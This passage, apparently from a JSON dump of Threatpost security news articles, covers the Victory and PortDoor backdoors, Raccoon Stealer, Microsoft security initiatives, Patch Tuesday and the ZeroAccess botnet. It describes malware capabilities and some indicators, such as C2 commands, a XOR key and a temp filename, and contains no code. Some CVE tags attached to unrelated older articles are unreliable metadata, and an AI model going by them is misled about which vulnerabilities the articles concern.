probably to complicate the analysis and decrease the detection rates at each stage,\u201d the form said. \u201cWe may also assume that there exist other modules based on the code from 2018 that might be installed by the attacker in the later stages of the attack.\u201d\n\n## **Attribution**\n\nCheck Point has attributed the campaign to a Chinese APT. One of the clues is that the first-stage C2 servers are hosted by two different cloud services, located in Hong Kong and Malaysia. These are active in only a limited daily window, returning payloads only from 01:00 \u2013 08:00 UTC Monday through Friday, which corresponds with the Chinese workday. Also, Check Point said that the servers went dormant in the period between May 1 and 5 \u2013 which China\u2019s Labor Day holidays.\n\nOn top of that, the RoyalRoad RTF exploit building kit is a tool of choice among Chinese APT groups; and some test versions of the backdoor contained internet connectivity check with www.baidu.com \u2013 a popular Chinese website.\n\n\u201cWe unveiled the latest activity of what seems to be a long-running Chinese operation that managed to stay under the radar for more than three years,\u201d Check Point concluded. \u201cIn this campaign, the attackers utilized the set of Microsoft Office exploits and loaders with anti-analysis and anti-debugging techniques to install a previously unknown backdoor.\u201d\n\n**Join Threatpost for \u201cA Walk On The Dark Side: A Pipeline Cyber Crisis Simulation\u201d\u2013 a LIVE interactive demo on **[**Wed, June 9 at 2:00 PM EDT**](<https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar>)**. Sponsored by Immersive Labs, find out whether you have the tools and skills to prevent a Colonial Pipeline-style attack on your organization. Questions and LIVE audience participation encouraged. Join the discussion and **[**Register HERE**](<https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar>)** for free.**\n", "cvss3": {}, "published": "2021-06-07T18:49:44", "type": "threatpost", "title": "Novel 'Victory' Backdoor Spotted in Chinese APT Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-06-07T18:49:44", "id": "THREATPOST:616358A88F9C1E69920585FDC717CF1F", "href": "https://threatpost.com/victory-backdoor-apt-campaign/166700/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-30T19:38:25", "description": "A previously undocumented backdoor malware, dubbed PortDoor, is being used by a probable Chinese advanced persistent threat actor (APT) to target the Russian defense sector, according to researchers.\n\nThe Cybereason Nocturnus Team observed the cybercriminals specifically going after the Rubin Design Bureau, which designs submarines for the Russian Federation\u2019s Navy. The initial target of the attack was a general director there named Igor Vladimirovich, researchers said, who received a phishing email.\n\n[![zoho webinar promo](https://media.threatpost.com/wp-content/uploads/sites/103/2021/04/29074106/Zoho_Webinar_Promo.png)](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nThe attack began with the [RoyalRoad weaponizer](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>), also known as the 8.t Dropper/RTF exploit builder \u2013 a tool that Cybereason said is [part of the arsenal of several Chinese APTs](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>), such as Tick, Tonto Team and TA428. RoyalRoad generates weaponized RTF documents that exploit vulnerabilities in Microsoft\u2019s [Equation Editor](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>) (CVE-2017-11882, CVE-2018-0798 and CVE-2018-0802).\n\nThe use of RoyalRoad is one of the reasons the company believes Chinese cybercriminals to be behind the attack.\n\n\u201cThe accumulated evidence, such as the infection vector, social-engineering style, use of RoyalRoad against similar targets, and other similarities between the newly discovered backdoor sample and other known Chinese APT malware, all bear the hallmarks of a threat actor operating on behalf of Chinese state-sponsored interests,\u201d according to a [Cybereason analysis](<https://www.cybereason.com/blog/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector>), published Friday.\n\n## **A Quiet Espionage Malware**\n\nThe RoyalRoad tool was seen fetching the unique PortDoor sample once the malicious RTF document is opened, which researchers said was designed with stealth in mind. It has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation, static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more.\n\nOnce executed, the backdoor decrypts the strings using a hardcoded 0xfe XOR key in order to retrieve its configuration information. This includes the command-and-control (C2) server address, a victim identifier and some other minor information.\n\nThe malware then creates an additional file in %temp% with the hardcoded name \u201c58097616.tmp\u201d and writes the GetTickCount value multiplied by a random number to it: \u201cThis can be used as an additional identifier for the target, and also as a placeholder for the previous presence of this malware,\u201d researchers explained.\n\nAfter that, it establishes its C2 connection, which facilitates the transfer of data using TCP over raw sockets, or via HTTPS \u2013 with proxy support. At this point, Cybereason said that PortDoor also has the ability to achieve privilege escalation by stealing explorer.exe tokens.\n\nThen, the malware gathers basic PC info to be sent to the C2, which it bundles with a unique identifier, after which is awaits further instructions.\n\nThe C2 commands are myriad:\n\n * List running processes\n * Open process\n * Get free space in logical drives\n * Files enumeration\n * Delete file\n * Move file\n * Create process with a hidden window\n * Open file for simultaneous operations\n * Write to file\n * Close handle\n * Open file and write directly to disk\n * Look for the \u201cKr*^j4\u201d string\n * Create pipe, copy data from it and AES encrypt\n * Write data to file, append with \u201c\\n\u201d\n * Write data to file, append with \u201cexit\\n\u201d\n\nPortDoor also employs an anti-analysis technique known as dynamic API resolving, according to the analysis.\n\n\u201cThe backdoor is able to hide most of its main functionality and avoid static detection of suspicious API calls by dynamically resolving its API calls instead of using static imports,\u201d researchers explained.\n\n## **Chinese APTs in the Cyberattack Mix \u2013 Probably**\n\nCybereason\u2019s analysis did not yield up a specific Chinese APT actor who would likely be responsible for the attack. However, the researchers said they could make some educated guesses.\n\n\u201cThere are a couple of known Chinese APT groups that share quite a few similarities with the threat actor behind the new malware samples analyzed,\u201d according to the report.\n\nFor instance, the RTF file used in the attack was weaponized with RoyalRoad v7, which was previously observed being used by the Tonto Team, TA428 and Rancor APTs.\n\n\u201cBoth the Tonto Team and TA428 threat actors have been observed attacking Russian organizations in the past, and more specifically attacking research and defense-related targets,\u201d according to the analysis. \u201cWhen comparing the spear-phishing email and malicious documents in these attacks with previously examined phishing emails and lure documents used by the Tonto Team to attack Russian organizations, there are certain similarities in the linguistic and visual style used by the attackers in the phishing emails and documents.\u201d\n\nThat said, the PortDoor malware doesn\u2019t share significant code similarities with previously known malware used by those groups \u2013 leading Cybereason to conclude that it is not a variant of a known malware, which makes it useless in attribution efforts.\n\n\u201cLastly, we are also aware that there could be other groups, known or yet unknown, that could be behind the attack and the development of the PortDoor backdoor,\u201d researchers concluded. \u201cWe hope that as time goes by, and with more evidence gathered, the attribution could be more concrete.\u201d\n\n**Download our exclusive FREE Threatpost Insider eBook,** **_\u201c[2021: The Evolution of Ransomware](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>),\u201d_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. Get the whole story and [DOWNLOAD](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>) the eBook now \u2013 on us!**\n\n_ _\n", "cvss3": {}, "published": "2021-04-30T19:32:34", "type": "threatpost", "title": "PortDoor Espionage Malware Takes Aim at Russian Defense Sector", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-04-30T19:32:34", "id": "THREATPOST:9AE8698D8AABA0F11676A29CECC6D7BA", "href": "https://threatpost.com/portdoor-espionage-malware-takes-aim-at-russian-defense-sector/165770/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-09T11:33:23", "description": "Criminals behind malware dubbed Raccoon Stealer have adopted a simple and effective technique to circumvent Microsoft and Symantec anti-spam messaging gateways. The technique has been used in a recent campaign targeting financial institutions via business email compromise (BEC) attacks.\n\nAccording to a [Cofense report posted Thursday](<https://cofense.com/raccoon-stealer-found-rummaging-past-symantec-microsoft-gateways/>), the malware is delivered inside an .IMG file hosted on a hacker-controlled Dropbox account.\n\n\u201cUsing the familiar theme of a wire transfer\u2014closely akin to those often seen in business email compromise scams\u2014the threat actors look to trick users into opening the Dropbox URL and downloading the malicious file,\u201d wrote Cofense authors Max Gannon and Alan Rainer. \n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>) \nWhat makes the Raccoon Stealer interesting to researchers is that it is new, easy-to-use and under active development by the hackers behind it. Cofense said the malware was first spotted in April of 2019 and since then has been leveraged in several different campaigns.\n\nThe malware is sold on underground forums in both Russian and English and includes around-the-clock customer support, Cofense said.\n\nAccording to research published in October by Cybereason, the malware has infected hundreds of thousands of Windows systems since April. Researchers there said developers behind the Raccoon Stealer charge $200 months for it use.\n\n\u201cIn this most recent campaign, a potentially compromised email account was used to send the email,\u201d researchers at Cofense wrote. Those messages managed to make it past Symantec Email Security and Microsoft EOP gateways \u201cwithout the URL being removed or tampered with to the extent that it would prevent victims from clicking on it and downloading the payload.\u201d\n\nBecause of the malware\u2019s flexibility to deliver a variety of payloads the Raccoon Stealer is gaining traction in underground markets, said researchers.\n\n**Tricky Raccoons**\n\nIn previous campaigns, Cofense researchers said the Raccoon Stealer malware has hid inside RFT document attachments and targeted the utilities sector. In those campaigns, adversaries behind the attacks attempted to leverage a known Microsoft Office remote code execution vulnerability ([CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>)) that dates back to 2017.\n\n\u201cAlthough not particularly advanced or subtle with its network activity and processes, the malware can quickly gather and exfiltrate data as well as download additional payloads,\u201d researchers wrote.\n\nThe Raccoon Stealer malware has also been leveraged by attackers behind the Fallout exploit kit. [Over the summer](<https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf>), researchers at Bitdefender observed malicious online ads being used to deliver Raccoon Stealer to vulnerable systems. Exfiltrated from those endpoints were login credentials, auto-fill information and cookies from the Google Chrome and Mozilla browsers. Also stolen were credential for various crypto wallets.\n\n\u201cGiven the variety of delivery options, Raccoon Stealer could be a problem for organizations that focus too much on one infection vector,\u201d Cofense researchers said.\n\n_**Is MFA enough to protect modern enterprises in the peak era of data breaches? How can you truly secure consumer accounts? Prevent account takeover? Find out: Catch our free, on-demand **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**, \u201cTrends in Fortune 1000 Breach Exposure\u201d to hear advice from breach expert Chip Witt of SpyCloud. **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**.**_\n", "cvss3": {}, "published": "2019-11-22T13:32:10", "type": "threatpost", "title": "Raccoon Stealer Malware Scurries Past Microsoft Messaging Gateways", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-8570"], "modified": "2019-11-22T13:32:10", "id": "THREATPOST:C0A58646680EABD23F9ABE6CC20F9F2E", "href": "https://threatpost.com/raccoon-stealer-malware-scurries-past-microsoft-messaging-gateways/150545/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:09:45", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054213/adam_shostack_.jpg)](<https://threatpost.com/adam-shostack-privacy-and-pets-09-workshop-081309/>)\n\nDennis Fisher talks with Microsoft\u2019s Adam Shostack about the [Privacy Enhancing Technologies Symposium](<http://petsymposium.org/2009/program.php>), the definition of privacy in today\u2019s world and the role of technology in helping to enhance and protect that privacy.\n\nShow notes: Adam\u2019s [blog post on \u201cUnderstanding Privacy\u201d](<http://www.emergentchaos.com/archives/2008/08/solves_understanding_priv.html>) by Dan Solove.\n\nMicrosoft\u2019s [Privacy Guidelines for Developing Software Products and Services](<http://www.microsoft.com/downloads/details.aspx?FamilyId=C48CF80F-6E87-48F5-83EC-A18D1AD2FC1F&displaylang=en>).\n\n[(Download)](<https://threatpost.com/files/2013/04/digital_underground_261.mp3>)\n\nSubscribe to the Digital Underground podcast on [**![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054213/itunes_button399.jpg)**](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n", "cvss3": {}, "published": "2009-08-13T20:34:53", "type": "threatpost", "title": "Adam Shostack on Privacy and the PETS '09 Workshop", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:49", "id": "THREATPOST:2A42363A8B070949A25091DE7946F5A2", "href": "https://threatpost.com/adam-shostack-privacy-and-pets-09-workshop-081309/72968/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:26", "description": "![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053310/windows_cofee1.jpg)Microsoft has announced plans to give away free versions of its COFEE (Computer Online Forensic Evidence Extractor) utility to help law enforcement agencies in cyber-crime investigations. \n\nCOFEE uses digital forensic technologies to help investigators gather evidence of live computer activity at the scene of a crime, regardless of technical expertise. \n \nLaw enforcement agents with less than 10 minutes training can capture live evidence of illegal activity by inserting the COFEE USB device into a computer. \n\nThe evidence is then preserved for analysis, protecting it from being destroyed when the computer is turned off for moving. \n\nMicrosoft explains:\n\n> A common challenge of cybercrime investigations is the need to conduct forensic analysis on a computer before it is powered down and restarted. Live evidence, such as some active system processes and network data, is volatile and may be lost while a computer is turning off. This evidence may contain information that could assist in the investigation and prosecution of a crime. With COFEE, a front-line officer doesn\u2019t have to be a computer expert to capture this volatile information before turning off the computer on the scene for later analysis. An officer with minimal computer experience can be tutored to use a pre-configured COFEE device in less than 10 minutes. This enables him or her to take advantage of common digital forensics tools the experts use to gather important volatile evidence while doing little more than simply inserting a USB device into the computer.\n\n[Read the full announcement](<http://www.microsoft.com/presspass/press/2009/oct09/10-13cofeepr.mspx>) [microsoft.com] \n", "cvss3": {}, "published": "2009-10-19T18:59:24", "type": "threatpost", "title": "Free COFEE Helps Law Enforcement Forensics", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:24:46", "id": "THREATPOST:D587192A5DA9FB1680FF9D453F96B972", "href": "https://threatpost.com/free-cofee-helps-law-enforcement-forensics-101909/72343/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:33", "description": "Computer users are taking steps to mitigate online security threats, but still only score a paltry 34 out of 100 \u2013 a solid \u201cF\u201d \u2013 according to a new study by Microsoft. \n\nThe study, sponsored by [Microsoft\u2019s Trustworthy Computing Group](<http://www.microsoft.com/about/twc/en/us/default.aspx>) (TwC), introduces a new metric, the [Microsoft Computing Safety Index](<http://www.microsoft.com/security/resources/mcsi.aspx>) (MCSI) to measure online safety, but finds that consumers are having trouble getting past the basics when it comes to staying safe on the Internet.\n\nThe MCSI assigns a point value to a series of steps (more than 20 in all) that consumers can take to protect themselves online. Each point in turn is assigned to a tier of activity: Foundational (30 points), Technical (40 points) and Behavioral (30 points).\n\nActions like keeping strong passwords and choosing reputable Web sites fall under the Behavioral tier. Using a firewall, maintaining anti-virus software and running regular updates falls under the Foundational tier. The more steps you take, the higher your MCSI score, with 100 being the highest score possible.\n\nMicrosoft polled consumers in U.S., U.K., Germany, France and Brazil in what the company called a \u2018benchmark survey.\u2019 The average MCSI from that poll, 34, suggests users have the basics covered but have left lots of room to improve, Microsoft said.\n\nAmong the five countries, 55 percent of users use automatic computer updates and roughly 90 percent of those surveyed use anti-virus protection. Conversely, only 26 percent of users said they had confidence in their PC security software while only eleven percent agreed \u201cgood digital citizens\u201d are winning the war against hackers.\n\nThe metric was developed in conjunction with the upcoming 10-year anniversary of the [Trustworthy Computing Group](<https://threatpost.com/katie-moussouris-microsoft-trustworthy-computing-and-evolution-security-community-031611/>) next year and was released as October, [National Cyber Security Awareness Month](<https://threatpost.com/president-obama-national-cybersecurity-awareness-month-101909/>), winds down.\n", "cvss3": {}, "published": "2011-10-27T21:22:26", "type": "threatpost", "title": "Microsoft Invents New Way To Measure Online Safety (And Finds That Consumers Stink At It)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:29", "id": "THREATPOST:11053DD231ACA5F34708B38E7E96AE9F", "href": "https://threatpost.com/microsoft-invents-new-way-measure-online-safety-and-finds-consumers-stink-it-102711/75813/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Microsoft earlier this week published [a 25-page framework](<http://blogs.microsoft.com/cybertrust/2015/01/27/putting-information-sharing-into-context/>) offering guidance on how to effectively share information and what kinds of information need to be shared in order to reduce overall risk.\n\n[Information sharing](<http://threatpost.com/information-sharing-on-threats-seen-as-a-key-for-auto-makers/108185>) has been an oft-repeated refrain in security and policy-making circles for the better part of the last decade. There have been [draft bills](<http://threatpost.com/senate-draft-bill-to-protect-threat-information-sharing/105769>), [sharing platforms](<http://threatpost.com/microsoft-to-preview-interflow-information-sharing-platform/106798>) and every kind of [appeal](<http://threatpost.com/nsas-alexander-appeals-for-threat-information-sharing/102404>), [encouragement](<http://threatpost.com/regulator-warns-banks-about-ddos-attacks-encourages-information-sharing-122712/77349>) and assurance; yet there has also been quiet mutterings that organizations simply do not want to share information for a variety of reasons, not limited to competition concerns and personal embarrassment. In theory, sharing information and building a sort of defensive cooperative seems simple enough. However, the reality is that we are still talking about threat information sharing like it isn\u2019t happening despite the fact that it\u2019s a perpetual topic of discussion at nearly every corporate and government security conference.\n\nMicrosoft\u2019s framework seeks to define all the parties that need to be involved in any comprehensive information sharing exchange as well as the types of information that those groups need to be sharing. In addition to knowing with whom to share what information, Microsoft\u2019s document offers insight into designing methods, mechanisms and models for data sharing exchanges.\n\nBroadly speaking, Microsoft advises that organizations develop an overarching strategy for information sharing and collaboration with built-in privacy protections and a well-established governance processes. Sharing, they say, should focus on actionable threat, vulnerability and mitigation information. Organizations need to build relationships in order to enable voluntary, trust-based information sharing, whereas mandatory sharing should remain limited. Once information is being shared, companies must ensure they are using that information to its full potential. Beyond these, Microsoft says their needs to be a voluntary, global exchange of emerging best practices.\n\nPerhaps not quite as broadly as best practices, Microsoft is encouraging that information-sharing exchanges of varying degrees of openness discuss successful attacks, including the information lost, techniques used, intent, and impact. They should also trade information about potential future threats and exploitable vulnerabilities and ways of mitigating bugs ahead of patch releases. Executive-level situational awareness, which could allow organizations to respond more quickly to attacks as well as strategic analysis of threats face and information sought by attackers should be shared too.\n\nLaws can compel incident reporting, but they do not increase trust or collaboration nor do they reduce risks\n\nMicrosoft says there are basically six categories of people to include in exchanges: governments, private critical infrastructure firms, enterprises, information technology, security companies and security researchers.\n\nMicrosoft encourages efforts by policymakers to construct legislation that would encourage information sharing. However, trust between those incorporated into information sharing exchanges, the computer company says, is critically important.\n\n\u201cLaws can compel incident reporting,\u201d Microsoft notes, \u201cbut they do not increase trust or collaboration nor do they reduce risks.\u201d\n\nExchange models can be voluntary or mandatory, though Microsoft explains that the former is the richer model. Microsoft favors voluntary sharing models because they serve to increase the level of trust between partners. On the other hand, mandatory models could shift the focus from smart collaborative defense to companies merely reporting threat-related information for the sake of reporting it because they are required to do so.\n\n> Microsoft publishes guidance on establishing and operating threat information sharing exchanges\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fmicrosoft-publishes-information-sharing-guidelines%2F110740%2F&text=Microsoft+publishes+guidance+on+establishing+and+operating+threat+information+sharing+exchanges>)\n\nIn terms of exchange methodology, organizations and groups thereof need to consider the level of formality of their network. Formal exchanges are generally based on contractual or non-disclosure agreements while less formal, ad hoc exchanges are generally event-specific. Subsets of formalized exchanges will be necessarily based on security clearance levels while less formalized groups of like-minded organizations can share information with one another based entirely on trust within the group.\n\n\u201cHigh-quality strategic information can help to project where the next classes of cyber-threats may come from and to identify the incentives that could motivate future attackers, along with the technologies they may target,\u201d Microsoft says. \u201cAdditionally, strategic analysis can help put incidents into a broader context and can drive internal changes, enhancing the ability of any public or private organization to update risk management practices that reduce its exposure to risk.\u201d\n\nInformation sharing, Microsoft\u2019s Cristin Goodwin and J. Paul Nicholas explain, is not merely a human-to-human exercise but must also be automated between machines to some degree.\n\n\u201cAmong security professionals, there is currently a lot of focus on developing systems that automate the exchange of information,\u201d Microsoft wrote. \u201cIt is believed that such systems enable actors not only to identify information important to them more quickly, but also to automate mitigations to threats as they occur.\u201d\n", "cvss3": {}, "published": "2015-01-29T13:58:34", "type": "threatpost", "title": "Microsoft Publishes Information Sharing Framework", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-03T14:05:30", "id": "THREATPOST:6CF438E98DFFF4B4057CAFB1382A4D3C", "href": "https://threatpost.com/microsoft-publishes-information-sharing-guidelines/110740/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:03", "description": "Since the beginning of recorded time, security researchers, software vendors and hackers have been issuing security advisories in all kinds of nutty formats. Some feature excellent ASCII art, some have clever inside jokes and some come from Microsoft. Now, there\u2019s a effort underway, called the Common Vulnerability Reporting Framework, to standardize the way that vulnerabilities are reported so that they\u2019re in a common, machine-readable format. \n\nThe [CVRF](<http://www.icasi.org/cvrf>) is the product of a group called the Industry Consortium for Advancement of Security on the Internet, and Microsoft in May for the first time produced its monthly Patch Tuesday advisories in the CVRF format. The company said that while the CVRF itself is still in its initial stages and will continue to evolve, the current version should give enterprise customers a good option for automating bulletin deployment. \n\n\u201cFor many customers, a machine-readable markup framework for security releases might not be a pressing need. For instance, home-computer users or small businesses may choose to install security updates automatically. However, many business customers spend time \u201ccopying and pasting\u201d our security bulletin content into their risk management systems, spreadsheets and corporate notification emails manually as part of their IT security compliance and remediation task list,\u201d [Microsoft\u2019s Mike Reavey](<http://blogs.technet.com/b/msrc/archive/2012/05/17/microsoft-security-updates-and-the-common-vulnerability-reporting-framework.aspx>) said in a blog post on CVRF.\n\n\u201cFor these customers, this machine-readable format may enable more efficiency and automation. Faster and more efficient guidance for these customers means they can more quickly ensure protection, which is always our goal. For those that do not require automation, we will continue to offer our bulletins in the current format.\u201d\n\nICASI members include IBM, Cisco, Juniper, Nokia and Amazon, among other companies. The current version of CVRF is 1.1, the second iteration, and the framework will continue to change as users provide feedback and requirements evolve.\n\n\u201cCVRF was created to fill a major gap in vulnerability standardization: the lack of a standard framework for the creation of vulnerability report documentation. Although the computer security community had made significant progress in several other areas, including categorizing and ranking the severity of vulnerabilities in information systems with the widespread adoption of the Common Vulnerabilities and Exposures (CVE) dictionary and the Common Vulnerability Scoring System (CVSS), this lack of standardization was evident in every vulnerability report, best practice document, or security bulletin released by any vendor or coordinator,\u201d the CVRF documentation says.\n", "cvss3": {}, "published": "2012-05-18T17:52:11", "type": "threatpost", "title": "Microsoft Adopts CVRF Format for Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:13", "id": "THREATPOST:A21BD1B60411A9861212745052E23AE7", "href": "https://threatpost.com/microsoft-adopts-cvrf-format-security-bulletins-051812/76582/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:42", "description": "As expected, Microsoft delivered a patch today for a [zero-day vulnerability in Internet Explorer 8](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>) that was disclosed by HP\u2019s Zero Day Initiative three weeks ago, six months after it was reported to the ZDI.\n\nThe IE8 patch, [MS14-035](<https://technet.microsoft.com/library/security/ms14-035>), is included in a cumulative Internet Explorer rollup that patches 59 flaws in the browser. Most of them are remote-code execution bugs rolling all the way back to IE 6 running on Windows Server 2003 SP2.\n\nThe zero day affects only IE 8, which lacks some of the exploit mitigations in later versions of the browser. Microsoft said in May that it was aware of the issue.\n\n\u201cAlthough no attacks have been detected in the wild, the ZDI advisory has given attackers a head start understanding this vulnerability, possibly reducing the time required for researchers to reverse engineer the fix and devise exploit code,\u201d said Craig Young, a security researcher with Tripwire.\n\nSeven bulletins were released today, one other rated critical, and five rated important.\n\nSeven bulletins were released today, one other rated critical, and five rated important.\n\nExperts are urging IT administrators to take a close look at a bulletin for Microsoft Word, [MS14-034](<https://technet.microsoft.com/library/security/ms14-034>), which while rated important by Microsoft, should be the next highest patching priority behind IE.\n\nAffecting Microsoft Word 2007, users could be exposed to remote code execution exploits if a malicious Word document is opened on a vulnerable computer.\n\n\u201cMicrosoft rates it only \u2018important\u2019 because user interaction is required\u2014one has to open a Word file\u2014but it allows the attacker Remote Code Execution. In addition, attackers have become quite skilled at tricking users into opening files,\u201d said Qualys CTO Wolfgang Kandek. \u201cWho wouldn\u2019t open a document that brings new information about the company\u2019s retirement plan? The Word vulnerability is in the newer DOCX file format and only applies to the 2007 release. If you are using the newer versions of Office/Word 2010 or 2013 you are not affected.\u201d\n\nThe second critical bulletin, [MS14-036](<https://technet.microsoft.com/library/security/ms14-036>), patches remote code execution bugs in Microsoft graphics in Office and Lync that could be exploited by users visiting malicious webpages or opening a malicious Office file.\n\n\u201cGraphics parsing requires complex logic and has frequently been associated with attack vectors,\u201d said Kandek. \u201cIt affects Windows, Office and the Lync IM client because they all bring their own copy.\u201d\n\nThis month bring 2014\u2019s total number of bulletins issued by Microsoft to 36, well below last year\u2019s pace of 46 through June.\n\n\u201cWe have become accustomed to see around 100 security bulletins for Microsoft products a year, but it looks as if we are in for fewer this year. This runs counter to the general tendency of the year which has already seen its shares of big breaches, 0-days and the big Heartbleed vulnerability in OpenSSL,\u201d Kandek said. \u201cMaybe the reduced count is based on the increased presence of vulnerability brokers that buy up vulnerabilities for internal use? We will see how the second part of the year develops.\u201d\n\nThe remaining bulletins are rated important and include a pair of information disclosure bugs, one denial of service flaw and a tampering vulnerability.\n\n * [MS14-033](<https://technet.microsoft.com/library/security/ms14-033>) addresses an information disclosure vulnerability in Microsoft XML Core Serivces; an exploit on a website designed to invoke XML Core Services through IE could leak data to an attacker.\n * [MS14-032](<https://technet.microsoft.com/library/security/ms14-032>) also patches an information disclosure bug in Microsoft Lync Server. A user tricked into joining a Lync meeting by clicking on a malicious meeting URL could be exploited.\n * [MS14-031](<https://technet.microsoft.com/library/security/ms14-031>) fixes a denial-of-service bug in TCP. An attacker sending a malicious sequence of packets to the target system could cause it to crash.\n * [MS14-030](<https://technet.microsoft.com/library/security/ms14-030>) patches a vulnerability in Remote Desktop that could allow tampering, Microsoft said. If an attacker has man in the middle access to the same network segment as the targeted system during an RDP session and sends malicious RDP packets, they could exploit the vulnerability.\n\n**Adobe Patches Flash Player**\n\nAdobe released a new version of Flash Player that addresses a [critical vulnerability](<http://helpx.adobe.com/security/products/flash-player/apsb14-16.html>) in the software.\n\nFlash 13.0.0.214 and earlier versions for Windows and Macintosh and Adobe Flash Player 11.2.202.359 and earlier versions for Linux are affected.\n\nAdobe said there are no active exploits against these vulnerabilities.\n", "cvss3": {}, "published": "2014-06-10T14:09:16", "type": "threatpost", "title": "June 2014 Microsoft Patch Tuesday security updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-06-13T15:41:16", "id": "THREATPOST:3F9DD13AA9EC2148FD8D14BD00233287", "href": "https://threatpost.com/microsoft-patches-ie8-zero-day-critical-word-bug/106572/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Long thought dead, the peer-to-peer (P2P) ZeroAccess botnet has resurfaced, and as of just a few weeks ago, has returned to propagating click-fraud scams.\n\nResearchers with Dell\u2019s SecureWorks [revealed Wednesday](<http://www.secureworks.com/resources/blog/zeroaccess-botnet-resumes-click-fraud-activity-after-six-month-break/>) that they witnessed the botnet restart itself from March 21 to July 2, 2014 and that halfway through this month \u2013 six months after it was last seen \u2013 the botnet has apparently gone back to its old ways and is again doling out click-fraud templates.\n\nClick-fraud, one of the easier techniques cybercriminals use to monetize malware, is essentially the embezzling of ad revenue from clicks that don\u2019t come from legitimate customers.\n\nDespite the botnet\u2019s resurfacing, researchers insist it hasn\u2019t grown or even tried to incorporate new compromises. Instead the botnet, which has split into two smaller botnets that use different UDP ports, is built around hosts from past infections.\n\nAs seen below, researchers found ZeroAccess in two smaller botnets in both 32-bit (blue) and 64-bit (gray) compromised Windows systems.\n\n![jan](https://media.threatpost.com/wp-content/uploads/sites/103/2015/01/07005918/jan.jpg)\n\n\u201cCompromised systems act as nodes in the P2P network, and they periodically receive new templates that include URLs for 